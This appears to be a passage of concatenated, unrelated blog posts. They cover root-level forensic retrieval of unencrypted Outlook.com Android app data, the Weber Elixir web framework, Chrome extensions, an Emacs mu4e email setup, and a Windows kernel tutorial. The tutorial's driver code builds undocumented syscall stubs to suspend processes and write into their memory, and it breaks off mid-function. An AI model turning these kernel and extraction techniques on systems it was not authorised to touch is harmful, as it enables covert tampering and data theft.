Technicians should be able to retrieve the emails by rooting the phone and retrieving the file at /data/data/com.outlook.Z7/databases/email.db. Once rooted, attachments can be found in the folder /sdcard/Attachments/. The default email address may also be found by looking for the string "email_default_from_address" in the file /data/data/com.outlook.Z7/shared_prefs/com.outlook.Z7_preferences.xml. Also note that contacts and messages are stored in the email.db database as well, which may contain additional proof of a communication between two parties.

Lost Feature: Encryption?

We discovered the following, which may indicate a possible future role for encryption in the Outlook.com app. In order to test the extent of the "in place" encryption infrastructure, we decided to force-enable encryption by changing the value of Z7MetaData.ClientConfig.UseEncryption in the AndroidManifest.xml to true, and then recompiling and reinstalling the Outlook apk. This did trigger encryption in the subject and html_body columns (the body column is not used) but did not encrypt the preview column in the database.

Again, please note this was just an experiment. The encryption is not enabled in the app, and the encryption feature set may be incomplete. We hope the encryption mechanism scaffolding we see here can be modified and included in a future release.

Vendor Coordination

Microsoft Security Response Center was notified via encrypted email of these observed behaviors on December 3rd, 2013. The key message in the response received that same day was "...users should not assume data is encrypted by default in any application or operating system unless an explicit promise to that effect has been made." On May 15th, 2014 we contacted Microsoft asking for reconsideration of our report and mentioning our plans to publish this research. They re-stated their position: users of the app should not expect encryption of transmitted or stored messages.

Version Information

Our original research was conducted on the following app version:

Application Label: Outlook.com
Process Name: com.outlook.Z7:client
Version: 7.8.2.12.49.2176
APK(s):
com.outlook.Z7-1.apk (SHA1 14b76363ebe96954151965676cfc15761650ef7e)
com.outlook.Z7-2.apk (SHA1 41339b21ba5aac7030a9553ee7f341ff6f0a6cf2)

We also confirmed that the relevant classes have not changed by doing a hash comparison of the classes in the latest app version, which was released May 6th, 2014 (7.8.2.12.49.5701):

Version: 7.8.2.12
Build Number: 28.49.5701.3
Build Date: 2014-05-04
com.outlook.Z7-1.apk (SHA1 4ee3dc145f199357540a14e0f2ea7b8eb346401e)

Source
-
Weber - High Performance web framework for ElixirLang
Weber is an open source web framework for the Elixir programming language. It's very lightweight and easy to deploy. The main goal of Weber is to help developers to develop scalable web applications in the usual rails-like style. Weber is in an early development stage now (the first commit was 07.09.2013), but it already has many features:

Project generation
Json parsing/generation
Websockets
Sessions
i18n [experimental]
Grunt.js integration
HTML helpers

and many more; further features, such as code reloading, are planned or in progress now.

Architecture

I started Weber as a hobby project, and the main point was to make a high performance web framework. There are many optimizations in Weber in different places; more details can be found in the previous post. Weber's workflow is easy: the web server gets a request from the user and passes it to the handler. The handler tries to parse and match the request URL and executes whichever action the request calls for.

Routing

All of Weber's routing configuration is in the route.ex file. There is a route macro in Weber. The main goal of the router is to connect URLs with controllers and actions. You don't need to declare the route macro in your project to configure routing; it's already predefined after new project creation. Example of a routing configuration:

route on("GET", "/", :Simpletodo.Main, :action)
   |> on("POST", "/add/:note", :Simpletodo.Main, :add)

You can see here that Weber's router consists of the route macro and on/4 clauses. Every on/4 gets four parameters which define what to respond for a certain URL:

"GET" - HTTP method. Can be "GET", "POST", "PUT", "DELETE", "PATCH", "ANY"
"/" - url
:Simpletodo.Main - controller
:add - action

So if Weber gets a "/" request, it will call :Simpletodo.Main.action, get its response, and return it to the user.

The Weber router supports different features:

Regular expressions in a path:

route on("ANY", %r{/hello/([\w]+)}, :Simpletodo.Main, :action)

Controller/Action declaration with '#':

route on("GET", "/", "Simpletodo.Main#action")

Redirects:

route redirect("GET", "/redirect", "/weber")

Resource routing:

route resource(:Controller.Work)

which will generate:

route on("GET", "/controller/work/:id", :Controller.Work, :show)
   |> on("POST", "/controller/work/:id/create", :Controller.Work, :create)
   |> on("GET", "/controller/work/:id/edit", :Controller.Work, :edit)
   |> on("PUT", "/controller/work/:id/update", :Controller.Work, :update)
   |> on("DELETE", "/controller/work/:id/delete", :Controller.Work, :delete)

Controllers

The main unit in Weber is a controller. Every controller consists of actions. A controller is an ordinary Elixir module and an action is an ordinary Elixir function with two parameters. For example:

defmodule Simpletodo.Main do
  def action(_, conn) do
    {:render, [project: "simpleTodo"], []}
  end

  def add([body: body], conn) do
    {:json, [response: "ok"], [{"Content-Type", "application/json"}]}
  end
end

Action parameters:

bindings - url bindings. If you have the route path /add/:name, you will get here: [name: name]
connection - a Plug record (connection info)

Every action must return one of the predefined tuples. It can be:

{:render, [project: "simpleTodo"], [{"HttpHeaderName", "HttpHeaderValheaderVal"}]} - Renders the view from views/controller/action.html and sends it in the response. Or without headers: {:render, [project: "simpleTodo"]}
{:render_inline, "foo <%= bar %>", [bar: "baz"]} - Renders an inline template.
{:render_other, Elixir.Views.Index, [foo: "foo"], []} - Renders any view in the controller. Or without headers.
{:file, path, headers} - Sends a file in the response.
Or without headers: {:file, path}
{:json, [response: "ok"], [{"HttpHeaderName", "HttpHeaderValheaderVal"}]} - Weber converts the keyword list to json and sends it in the response. Or without headers: {:json, [response: "ok"]}
{:redirect, "/main"} - Redirects to another resource.
{:text, data, headers} - Sends plain text. Or without headers: {:text, data}
{:nothing, ["Cache-Control", "no-cache"]} - Sends an empty response with status 200 and headers.

Every action can have its own view. So if you have routing like this:

route on("ANY", "/", :MyProject.Main, :index)

and the action:

def index(_, _) do
  {:render, []}
end

Weber will render the lib/views/main/index.html view.

Templates

Weber uses EEx templates, similar to ERB in Rails:

<!DOCTYPE HTML>
<html>
  <head>
    <title>Simplechat</title>
  </head>
  <body>
    <span>Hello, <%= @project %></span>
  </body>
</html>

There are many HTML EEx helpers in Weber:

Weber.Helper.Html - build html from Elixir content
content_for - layout helper
include_view - include an html part into another html
Resource helper - script/css/audio/video...

Models

Weber has no facility of its own to use/build data models; instead you can use the Ecto library. Ecto is a domain specific language for writing queries and interacting with databases in Elixir. See the examples.

Benchmark

As I said above, I have tried, and am still trying, to make Weber high performance. I found a table comparing json transfers; here is my table with the same test:

Platform       Req/s (x1000)
NodeJS         27
Plain cowboy   32
ChicagoBoss    7.2
Zotonic        7.5
Weber          16.8

Links

Weber at github - Weber
weber-contrib - weber-contrib

Source
AdBlock Premium - I think there's no need to explain what this is; block it, block it;
Clear Cache Shortcut - a very simple and useful extension: clear the browser cache in one click;
CSSViewer - a simple CSS property viewer for Google Chrome, originally made by Nicolas Huon as a Firefox addon;
goo.gl URL Shortener extension - a URL shortener right in your browser;
Hangout Chat Notifications - get notifications from Google Hangouts in your browser;
Octotree - if you're using GitHub, you should really try this browser extension to display GitHub code in tree format;
Speed Dial - fast access to favorite web resources; it was the last thing that prompted me to move from Opera to Chrome;
Twitter for Chrome - I think there's no need to explain what this is;
Web Developer - the Web Developer extension adds various web developer tools to the browser. A very good and useful extension, many tools in one place;
Google Docs - Google Docs in the browser.

Source
-
I'm using Emacs every day, for almost everything; in fact I need only two user-level applications on my computer: Emacs and a web browser (despite eww in Emacs 25). I use Emacs for text editing, for chatting in IRC, for email reading/writing, for file manipulation, as my TODO list and much more (and this blog post was written in Emacs too). Today I want to show how to use Emacs for email handling. I will show how to install mu4e and offlineimap and configure Emacs for handling email from multiple accounts with these tools on ubuntu-14.10. If you're interested, read on.

Installing Emacs

Of course, first of all you must have Emacs installed on your computer. You can download it from here and build it from source. Or you can just use the apt-get package manager and install Emacs with:

sudo apt-get install emacs

mu4e

mu4e is an Emacs-based e-mail client. You can install it with the following commands:

sudo apt-get install html2text xdg-utils libgmime-2.6-dev libxapian-dev
git clone https://github.com/djcb/mu
cd mu && autoreconf -i && ./configure && make
sudo make install

After executing these commands, mu and mu4e should be installed.

offlineimap

OfflineIMAP is a Python utility to sync mail from IMAP servers. We can install it with:

sudo apt-get install offlineimap

offlineimap configuration

After we have installed all the software, we can start to configure it. Let's start with the offlineimap configuration. As I wrote, this post is about a multiple-account configuration; I personally have two email accounts, one for work and one personal. Let's call them Work and Personal. For the offlineimap configuration, open/create the ~/.offlineimaprc file. The offlineimap configuration file consists of sections and key = value records. Let's add the first section to ~/.offlineimaprc:

[general]
accounts = Work, Personal
maxsyncaccounts = 3

The first section is [general]. It contains two values: the first is accounts, where we declare the names of our accounts. The second is maxsyncaccounts; it controls how many accounts may be synced simultaneously.

Next we'll define the sections for the first account, Work:

[Account Work]
localrepository = WorkLocal
remoterepository = WorkRemote

[Repository WorkLocal]
type = Maildir
localfolders = ~/Maildir/Work

[Repository WorkRemote]
remotehost = host
remoteuser = user@email.com
remotepass = password
type = IMAP
ssl = yes
sslcacertfile = /etc/ssl/certs/ca-certificates.crt
holdconnectionopen = true
keepalive = 120
realdelete = yes

There are 3 sections per account. The first, [Account Work], ties together the local and remote repositories. The second section defines the type of mail directory (a Maildir) and the path to it. The third section defines the remote host parameters such as user email, host, protocol type (IMAP), ssl and so on. Of course you will need to change some parameters to your own values.

After this we must define the same 3 sections for the Personal account. It will contain the same fields as the first, with the small difference that it is configured for the gmail IMAP server:

[Account Personal]
localrepository = PersonalMailLocal
remoterepository = PersonalMailRemote

[Repository PersonalMailLocal]
type = Maildir
localfolders = ~/Maildir/Personal

[Repository PersonalMailRemote]
type = IMAP
remotehost = imap.gmail.com
remoteuser = email@gmail.com
remotepass = password
ssl = yes
sslcacertfile = /etc/ssl/certs/ca-certificates.crt
keepalive = 120
realdelete = yes
holdconnectionopen = true
After this, go to your terminal and execute:

mkdir -p ~/Maildir/Work
mkdir -p ~/Maildir/Personal
cd /home/user
offlineimap

It will fetch all mail from your mail servers, so you can work with it in Emacs.

Emacs configuration

As we have installed Emacs and mu4e, and we have configured offlineimap, we can move on to the Emacs configuration. First of all you need to tell Emacs where to load mu4e from, and enable it and the smtpmail package with:

(add-to-list 'load-path "/usr/local/share/emacs/site-lisp/mu4e")
(require 'mu4e)
(require 'smtpmail)

Now we define some general variables for both accounts:

(setq
 ;; general
 mu4e-get-mail-command "offlineimap"
 mu4e-update-interval 300
 ;; smtp
 message-send-mail-function 'smtpmail-send-it
 smtpmail-stream-type 'starttls
 ;; keybindings
 mu4e-maildir-shortcuts '(("/Personal/INBOX" . ?k)
                          ("/Personal/[Gmail].Trash" . ?t)
                          ("/Work/INBOX" . ?w)
                          ("/Work/Trash" . ?f))
 ;; attachment dir
 mu4e-attachment-dir "~/Downloads"
 ;; insert sign
 mu4e-compose-signature-auto-include 't)

As I said, here we define general parameters for both accounts: the program for fetching email (offlineimap in our case), the update interval, what we'll use for sending email (smtpmail in our case), the maildir shortcuts (we'll describe these later), the directory for attachments, and automatic insertion of the message signature.

Now we must add more variables to define the fields which differ between our two accounts:

(defvar my-mu4e-account-alist
  '(("Personal"
     ;; about me
     (user-mail-address "user@gmail.com")
     (user-full-name "Name")
     (mu4e-compose-signature "Best regards.\n0xAX")
     ;; smtp
     (smtpmail-stream-type starttls)
     (smtpmail-starttls-credentials '(("smtp.gmail.com" 587 nil nil)))
     (smtpmail-auth-credentials '(("smtp.gmail.com" 587 "user@gmail.com" nil)))
     (smtpmail-default-smtp-server "smtp.gmail.com")
     (smtpmail-smtp-server "smtp.gmail.com")
     (smtpmail-smtp-service 587))
    ("Work"
     ;; about me
     (user-mail-address "0xAX@work.com")
     (user-full-name "0xAX")
     (mu4e-compose-signature "0xAX")
     ;; smtp
     (smtpmail-stream-type starttls)
     (smtpmail-starttls-credentials '(("imap.work.net" 25 nil nil)))
     (smtpmail-auth-credentials '(("imap.work.net" 25 "0xAX@work.com" nil)))
     (smtpmail-default-smtp-server "imap.work.net")
     (smtpmail-smtp-service 25))))

These are the following fields: settings for your smtp servers, signatures and user info.

And add one function for choosing the account before composing a message:

;;
;; Found here - http://www.djcbsoftware.nl/code/mu/mu4e/Multiple-accounts.html
;;
(defun my-mu4e-set-account ()
  "Set the account for composing a message."
  (let* ((account
          (if mu4e-compose-parent-message
              (let ((maildir (mu4e-message-field mu4e-compose-parent-message :maildir)))
                (string-match "/\\(.*?\\)/" maildir)
                (match-string 1 maildir))
            (completing-read (format "Compose with account: (%s) "
                                     (mapconcat #'(lambda (var) (car var))
                                                my-mu4e-account-alist "/"))
                             (mapcar #'(lambda (var) (car var)) my-mu4e-account-alist)
                             nil t nil nil (car my-mu4e-account-alist))))
         (account-vars (cdr (assoc account my-mu4e-account-alist))))
    (if account-vars
        (mapc #'(lambda (var) (set (car var) (cadr var))) account-vars)
      (error "No email account found"))))

(add-hook 'mu4e-compose-pre-hook 'my-mu4e-set-account)

Technically that's all, but you can add some more customization, such as date formatting, image display and so on:

(setq message-citation-line-format "%N @ %Y-%m-%d %H:%M %Z:\n")
(setq message-citation-line-function 'message-insert-formatted-citation-line)
(setq mu4e-view-show-addresses 't)
(setq mu4e-headers-fields
      '((:date . 25)
        (:flags . 6)
        (:from . 22)
        (:subject . nil)))
(setq mu4e-show-images t)
(when (fboundp 'imagemagick-register-types)
  (imagemagick-register-types))
(setq mu4e-view-prefer-html t)
(setq mu4e-html2text-command "html2text -utf8 -width 72")
(setq mail-user-agent 'mu4e-user-agent)

Usage

OK, we have configured Emacs, mu4e and offlineimap. Time to use it. First of all, I have added a keybinding for opening mu4e:

(global-set-key [f1] 'mu4e)

Of course you can choose another key combination. Now, after pressing F1, I see the mu4e main window, the main mu4e view in Emacs. You can do the following actions here:

U - update email for both accounts
q - exit from mu4e
j-k - go to the personal inbox (remember, we defined these keybindings in mu4e-maildir-shortcuts)
j-w - go to the work inbox
C - compose a new message; it will ask you from which account you want to send it

Conclusion

This is the end. In this post I described how to configure Emacs + mu4e + offlineimap for email handling. As a longtime Emacs user I'm very interested in how and for what you use Emacs, what extensions you use and what tasks Emacs helps you solve; write me a comment about it. I hope this post was useful for you.

Source
-
Background

This post takes a different approach from the others and delves into the world of the Windows kernel. Specifically, it will cover how to access the undocumented APIs that are present within the kernel (ntoskrnl). If you trace a Windows API call from user mode to the kernel, you will find the endpoint to be something similar to what is shown below (Win 8 x64):

public NtOpenFile
NtOpenFile proc near
4C 8B D1          mov     r10, rcx
B8 31 00 00 00    mov     eax, 31h
0F 05             syscall
C3                retn
NtOpenFile endp

where the r10 register holds the value of the first argument and eax holds the index into the Windows internal syscall table. A note should be made that this is specific to an x64 operating system running a native x64 application. x86 systems rely on going through KiFastSystemCall in ntdll to invoke a syscall, and WOW64 emulation relies on making transitions from x64 to x86 and back and setting up an appropriate stack in between.

When the syscall instruction executes, the flow of code will eventually find its way to NtOpenFile in ntoskrnl. This is actually a wrapper around IopCreateFile (shown below):

public NtOpenFile
NtOpenFile proc near
4C 8B DC                   mov     r11, rsp
48 81 EC 88 00 00 00       sub     rsp, 88h
8B 84 24 B8 00 00 00       mov     eax, [rsp+88h+arg_28]
45 33 D2                   xor     r10d, r10d
4D 89 53 F0                mov     [r11-10h], r10
C7 44 24 70 20 00 00 00    mov     [rsp+88h+var_18], 20h
45 89 53 E0                mov     [r11-20h], r10d
4D 89 53 D8                mov     [r11-28h], r10
45 89 53 D0                mov     [r11-30h], r10d
45 89 53 C8                mov     [r11-38h], r10d
4D 89 53 C0                mov     [r11-40h], r10
89 44 24 40                mov     [rsp+88h+var_48], eax
8B 84 24 B0 00 00 00       mov     eax, [rsp+88h+arg_20]
C7 44 24 38 01 00 00 00    mov     [rsp+88h+var_50], 1
89 44 24 30                mov     [rsp+88h+var_58], eax
45 89 53 A0                mov     [r11-60h], r10d
4D 89 53 98                mov     [r11-68h], r10
E8 48 E2 FC FF             call    IopCreateFile
48 81 C4 88 00 00 00       add     rsp, 88h
C3                         retn
NtOpenFile endp

Again it should be noted that there was a lot of hand-waving going on here: the syscall instruction does not simply invoke the native kernel API, but goes through several routines responsible for setting up trap frames and performing access checks before arriving at the native API implementation. Exported native kernel APIs for use in drivers also follow a similar, but nowhere near as complex, mechanism. Every Zw* function in the kernel provides a thin wrapper around a call to the Nt* version (example shown below):

NTSTATUS __stdcall ZwOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions)

ZwOpenFile proc near
48 8B C4                mov     rax, rsp
FA                      cli
48 83 EC 10             sub     rsp, 10h
50                      push    rax
9C                      pushfq
6A 10                   push    10h
48 8D 05 BD 2F 00 00    lea     rax, KiServiceLinkage
50                      push    rax
B8 31 00 00 00          mov     eax, 31h
E9 C2 DA FF FF          jmp     KiServiceInternal
ZwOpenFile endp

This wrapper does basic things such as set up the stack, disable kernel interrupts (cli), and preserve flags. The KiServiceLinkage function is just a small stub that executes the ret instruction immediately. I have not had a chance to reverse it to see what purpose it serves — it was never even invoked when a breakpoint was set on it. Lastly, the syscall number (0x31) is put into eax and a jump to the KiServiceInternal routine is made. This routine, among other things, is responsible for setting the correct PreviousMode, traversing the Windows syscall table (commonly referred to as the System Service Dispatch Table, or SSDT), and invoking the native Nt* version of the API.
Getting Access to the APIs

So what is the relevance of all of this? The answer is that even though the kernel exports a ton of APIs for kernel/driver developers, there are still plenty of other ones which provide some pretty cool functionality — ones like ZwSuspendProcess/ZwResumeProcess, ZwReadVirtualMemory/ZwWriteVirtualMemory, etc., that are not available. Getting access to those APIs is really where this post begins. Before starting, there are several clear issues that need to be resolved:

1. The base address and image size in memory of the kernel (ntoskrnl) need to be found. This is obviously because the APIs lie somewhere within that memory region.
2. The syscalls need to be identified, and a generic way should be developed to allow us to invoke them.
3. Other issues related to using the APIs should be addressed. For example, process enumeration in the kernel in order to get a valid process handle for the target process in a ZwSuspendProcess/ZwResumeProcess call.

Addressing these in order: the first point is relatively simple, but also relies on undocumented features. Getting the address of the kernel in memory is as simple as calling ZwQuerySystemInformation with the undocumented SystemModuleInformation information class. What will be returned is a pointer to a SYSTEM_MODULE_INFORMATION structure containing a count of loaded modules in memory, followed by a variable-length array of SYSTEM_MODULE entries. A quick note to add is that the NtInternals documentation on the structure is a bit outdated, and the first two fields are of type ULONG_PTR instead of always a 32-bit ULONG. Finding the kernel base address and image size is simply a traversal of the SYSTEM_MODULE array and a substring search for the kernel name. The code is shown below:

PSYSTEM_MODULE GetKernelModuleInfo(VOID)
{
    PSYSTEM_MODULE SystemModule = NULL;
    PSYSTEM_MODULE FoundModule = NULL;
    ULONG_PTR SystemInfoLength = 0;
    PVOID Buffer = NULL;
    ULONG Count = 0;
    ULONG i = 0;
    ULONG j = 0;
    //Other names for WinXP
    CONST CHAR *KernelNames[] =
    {
        "ntoskrnl.exe", "ntkrnlmp.exe", "ntkrnlpa.exe", "ntkrpamp.exe"
    };

    //Perform error checking on the calls in actual code
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, &SystemInfoLength, 0, &SystemInfoLength);
    Buffer = ExAllocatePool(NonPagedPool, SystemInfoLength);
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, Buffer, SystemInfoLength, NULL);

    Count = ((PSYSTEM_MODULE_INFORMATION)Buffer)->ModulesCount;
    for(i = 0; i < Count; ++i)
    {
        SystemModule = &((PSYSTEM_MODULE_INFORMATION)Buffer)->Modules[i];
        for(j = 0; j < sizeof(KernelNames) / sizeof(KernelNames[0]); ++j)
        {
            if(strstr((LPCSTR)SystemModule->Name, KernelNames[j]) != NULL)
            {
                FoundModule = (PSYSTEM_MODULE)ExAllocatePool(NonPagedPool, sizeof(SYSTEM_MODULE));
                RtlCopyMemory(FoundModule, SystemModule, sizeof(SYSTEM_MODULE));
                ExFreePool(Buffer);
                return FoundModule;
            }
        }
    }
    DbgPrint("Could not find the kernel in module list\n");
    return NULL;
}

The above function will return the PSYSTEM_MODULE corresponding to information about the kernel (or NULL in the failure case).
Now that the base address and image size of the kernel are known, it is possible to begin coming up with a way to invoke the undocumented syscalls. Since all of the undocumented Zw* calls are nearly identical wrappers (with the exception of the syscall number) invoking KiSystemService, I present a generic way of invoking these calls by creating a functionally equivalent template in kernel memory and executing off of that. The general idea is to create a blank template such as the one shown below:

BYTE NullStub = 0xC3;

BYTE SyscallTemplate[] =
{
    0x48, 0x8B, 0xC4,                                            /*mov rax, rsp*/
    0xFA,                                                        /*cli*/
    0x48, 0x83, 0xEC, 0x10,                                      /*sub rsp, 0x10*/
    0x50,                                                        /*push rax*/
    0x9C,                                                        /*pushfq*/
    0x6A, 0x10,                                                  /*push 0x10*/
    0x48, 0xB8, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA,  /*mov rax, NullStubAddress*/
    0x50,                                                        /*push rax*/
    0xB8, 0xBB, 0xBB, 0xBB, 0xBB,                                /*mov eax, Syscall*/
    0x68, 0xCC, 0xCC, 0xCC, 0xCC,                                /*push LowBytes*/
    0xC7, 0x44, 0x24, 0x04, 0xCC, 0xCC, 0xCC, 0xCC,              /*mov [rsp+0x4], HighBytes*/
    0xC3                                                         /*ret*/
};

in non-paged memory, patch in the correct addresses (NullStub replacing KiServiceLinkage), patch in the syscall number, then invoke KiSystemService (here done by moving the 64-bit absolute address onto the stack and returning to it). Once fully patched at runtime, this data can simply be cast to the appropriate function pointer and invoked like normal. Here is the allocation and patching routine:

PVOID CreateSyscallWrapper(IN LONG Index)
{
    PVOID Buffer = ExAllocatePool(NonPagedPool, sizeof(SyscallTemplate));
    BYTE *NullStubAddress = &NullStub;
    BYTE *NullStubAddressIndex = ((BYTE *)Buffer) + (14 * sizeof(BYTE));
    BYTE *SyscallIndex = ((BYTE *)Buffer) + (24 * sizeof(BYTE));
    BYTE *LowBytesIndex = ((BYTE *)Buffer) + (29 * sizeof(BYTE));
    BYTE *HighBytesIndex = ((BYTE *)Buffer) + (37 * sizeof(BYTE));
    ULONG LowAddressBytes = ((ULONG_PTR)KiSystemService) & 0xFFFFFFFF;
    ULONG HighAddressBytes = ((ULONG_PTR)KiSystemService >> 32);

    RtlCopyMemory(Buffer, SyscallTemplate, sizeof(SyscallTemplate));
    RtlCopyMemory(NullStubAddressIndex, (PVOID)&NullStubAddress, sizeof(BYTE *));
    RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG));
    RtlCopyMemory(LowBytesIndex, &LowAddressBytes, sizeof(ULONG));
    RtlCopyMemory(HighBytesIndex, &HighAddressBytes, sizeof(ULONG));

    return Buffer;
}

Example usage of this is again shown below:

typedef NTSTATUS (NTAPI *pZwSuspendProcess)(IN HANDLE ProcessHandle);
pZwSuspendProcess ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x017A);

//This can then be invoked as normal, e.g.,
ZwSuspendProcess(x);
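To make the offset arithmetic in CreateSyscallWrapper easier to see, here is the same patching done in Python as an illustration only (the addresses below are made-up placeholders; offsets 14, 24, 29 and 37 index into the template above):

# Illustration of the patch-offset arithmetic used by CreateSyscallWrapper,
# done over a copy of the x64 template so the byte layout is visible.
import struct

TEMPLATE = bytearray(
    b"\x48\x8B\xC4"                              # 0..2   mov rax, rsp
    b"\xFA"                                      # 3      cli
    b"\x48\x83\xEC\x10"                          # 4..7   sub rsp, 0x10
    b"\x50"                                      # 8      push rax
    b"\x9C"                                      # 9      pushfq
    b"\x6A\x10"                                  # 10..11 push 0x10
    b"\x48\xB8\xAA\xAA\xAA\xAA\xAA\xAA\xAA\xAA"  # 12..21 mov rax, NullStubAddress
    b"\x50"                                      # 22     push rax
    b"\xB8\xBB\xBB\xBB\xBB"                      # 23..27 mov eax, Syscall
    b"\x68\xCC\xCC\xCC\xCC"                      # 28..32 push LowBytes
    b"\xC7\x44\x24\x04\xCC\xCC\xCC\xCC"          # 33..40 mov [rsp+4], HighBytes
    b"\xC3"                                      # 41     ret
)

def patch_stub(null_stub_addr: int, syscall_index: int, ki_system_service: int) -> bytes:
    stub = TEMPLATE[:]
    stub[14:22] = struct.pack("<Q", null_stub_addr)                   # 8-byte absolute address
    stub[24:28] = struct.pack("<I", syscall_index)                    # syscall number into eax
    stub[29:33] = struct.pack("<I", ki_system_service & 0xFFFFFFFF)   # low dword
    stub[37:41] = struct.pack("<I", ki_system_service >> 32)          # high dword
    return bytes(stub)

# Placeholder addresses purely for demonstration:
print(patch_stub(0xFFFFF80000000100, 0x017A, 0xFFFFF80000123456).hex())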
However, before doing that, the address of KiSystemService needs to be found so it can be properly patched in. This is, after all, partially why finding the base address of the kernel was important. This is done by scanning for the function's signature through the entirety of ntoskrnl's memory. The signature must be sufficiently long as to be unique, but preferably not so long that comparisons take a lot of time. The signature that I used for this example is shown below:

typedef VOID (*pKiSystemService)(VOID);
pKiSystemService KiSystemService;

NTSTATUS ResolveFunctions(IN PSYSTEM_MODULE KernelInfo)
{
    CONST BYTE KiSystemServiceSignature[] =
    {
        0x48, 0x83, 0xEC, 0x08, 0x55, 0x48, 0x81, 0xEC, 0x58, 0x01,
        0x00, 0x00, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00,
        0x48, 0x89, 0x9D, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xBD,
        0xC8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xB5, 0xD0, 0x00, 0x00,
        0x00, 0xFB, 0x65, 0x48, 0x8B, 0x1C, 0x25, 0x88, 0x01, 0x00,
        0x00
    };

    KiSystemService = (pKiSystemService)FindFunctionInModule(KiSystemServiceSignature,
        sizeof(KiSystemServiceSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
    if(KiSystemService == NULL)
    {
        DbgPrint("- Could not find KiSystemService\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found KiSystemService at %p\n", KiSystemService);

    //....
}

...
...

PVOID FindFunctionInModule(IN CONST BYTE *Signature, IN ULONG SignatureSize, IN PVOID KernelBaseAddress, IN ULONG ImageSize)
{
    BYTE *CurrentAddress = 0;
    ULONG i = 0;

    DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize);
    CurrentAddress = (BYTE *)KernelBaseAddress;
    for(i = 0; i < ImageSize; ++i)
    {
        if(RtlCompareMemory(CurrentAddress, Signature, SignatureSize) == SignatureSize)
        {
            DbgPrint("+ Found function at %p\n", CurrentAddress);
            return (PVOID)CurrentAddress;
        }
        ++CurrentAddress;
    }
    return NULL;
}

Once the ResolveFunctions() function executes, the CreateSyscallWrapper function is ready to be used as shown above. This will now resolve any syscall that you wish to call.
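Incidentally, the scanning idea itself is easy to prototype offline against the on-disk kernel image before putting it into a driver. A rough Python sketch follows; keep in mind that a file offset is not the same as the in-memory address (sections are aligned differently and the image is relocated), so this only confirms that the signature is unique:

# Offline illustration of the same signature scan, run against a copy of
# the kernel image on disk. The path and the signature (the first 20
# bytes of the x64 KiSystemService signature above) are examples.
KI_SYSTEM_SERVICE_SIG = bytes.fromhex(
    "4883EC08554881EC58010000488DAC2480000000"
)

with open(r"C:\Windows\System32\ntoskrnl.exe", "rb") as f:
    image = f.read()

offset = image.find(KI_SYSTEM_SERVICE_SIG)
print("not found" if offset < 0 else f"signature at file offset {offset:#x}")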
An Example

The code below is an example I wrote up showing how to write into the virtual address space of a target process. This process is given by name to the OpenProcess function, which retrieves the appropriate EPROCESS block corresponding to the process and opens a handle to it. This handle is then used in conjunction with the undocumented APIs associated with process manipulation (ZwSuspendProcess/ZwResumeProcess) and virtual memory manipulation (ZwProtectVirtualMemory/ZwWriteVirtualMemory). An internal undocumented function (PsGetNextProcess) is also scanned for and retrieved in order to help facilitate process enumeration. The code was written for and tested on an x86 version of Windows XP SP3 and x64 Windows 7 SP1.

#include "stdafx.h"
#include "Undocumented.h"
#include <ntddk.h>

#ifdef __cplusplus
extern "C" NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath);
#endif

pPsGetProcessImageFileName PsGetProcessImageFileName;
pPsGetProcessSectionBaseAddress PsGetProcessSectionBaseAddress;
pPsGetNextProcess PsGetNextProcess;
pZwSuspendProcess ZwSuspendProcess;
pZwResumeProcess ZwResumeProcess;
pZwProtectVirtualMemory ZwProtectVirtualMemory;
pZwWriteVirtualMemory ZwWriteVirtualMemory;
pKiSystemService KiSystemService;

#ifdef _M_IX86
__declspec(naked) VOID SyscallTemplate(VOID)
{
    __asm
    {
        /*B8 XX XX XX XX   */ mov eax, 0xC0DE
        /*8D 54 24 04      */ lea edx, [esp + 0x4]
        /*9C               */ pushfd
        /*6A 08            */ push 0x8
        /*FF 15 XX XX XX XX*/ call KiSystemService
        /*C2 XX XX         */ retn 0xBBBB
    }
}
#elif defined(_M_AMD64)
BYTE NullStub = 0xC3;

BYTE SyscallTemplate[] =
{
    0x48, 0x8B, 0xC4,                                            /*mov rax, rsp*/
    0xFA,                                                        /*cli*/
    0x48, 0x83, 0xEC, 0x10,                                      /*sub rsp, 0x10*/
    0x50,                                                        /*push rax*/
    0x9C,                                                        /*pushfq*/
    0x6A, 0x10,                                                  /*push 0x10*/
    0x48, 0xB8, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA,  /*mov rax, NullStubAddress*/
    0x50,                                                        /*push rax*/
    0xB8, 0xBB, 0xBB, 0xBB, 0xBB,                                /*mov eax, Syscall*/
    0x68, 0xCC, 0xCC, 0xCC, 0xCC,                                /*push LowBytes*/
    0xC7, 0x44, 0x24, 0x04, 0xCC, 0xCC, 0xCC, 0xCC,              /*mov [rsp+0x4], HighBytes*/
    0xC3                                                         /*ret*/
};
#endif

PVOID FindFunctionInModule(IN CONST BYTE *Signature, IN ULONG SignatureSize, IN PVOID KernelBaseAddress, IN ULONG ImageSize)
{
    BYTE *CurrentAddress = 0;
    ULONG i = 0;

    DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize);
    CurrentAddress = (BYTE *)KernelBaseAddress;
    for(i = 0; i < ImageSize; ++i)
    {
        if(RtlCompareMemory(CurrentAddress, Signature, SignatureSize) == SignatureSize)
        {
            DbgPrint("+ Found function at %p\n", CurrentAddress);
            return (PVOID)CurrentAddress;
        }
        ++CurrentAddress;
    }
    return NULL;
}

NTSTATUS ResolveFunctions(IN PSYSTEM_MODULE KernelInfo)
{
